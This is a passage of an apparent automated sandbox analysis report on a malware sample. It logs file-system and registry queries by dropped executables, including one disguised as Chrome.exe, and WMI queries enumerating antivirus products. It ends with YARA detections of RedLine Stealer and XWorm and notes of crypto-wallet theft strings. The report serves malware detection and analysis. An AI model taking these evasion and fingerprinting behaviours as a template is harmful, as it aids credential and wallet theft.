                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeQueries volume information: C:\Users\user\AppData\Roaming\M2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeQueries volume information: C:\Users\user\AppData\Roaming\Metin.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\M2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Metin.exe, 00000009.00000002.2552335179.000000001B9D4000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2531332433.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2552335179.000000001BA66000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2531332433.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED
                        Yara detected XWorm
                        Source: Yara matchFile source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.Metin.exe.2ccf5a8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Metin.exe PID: 7184, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
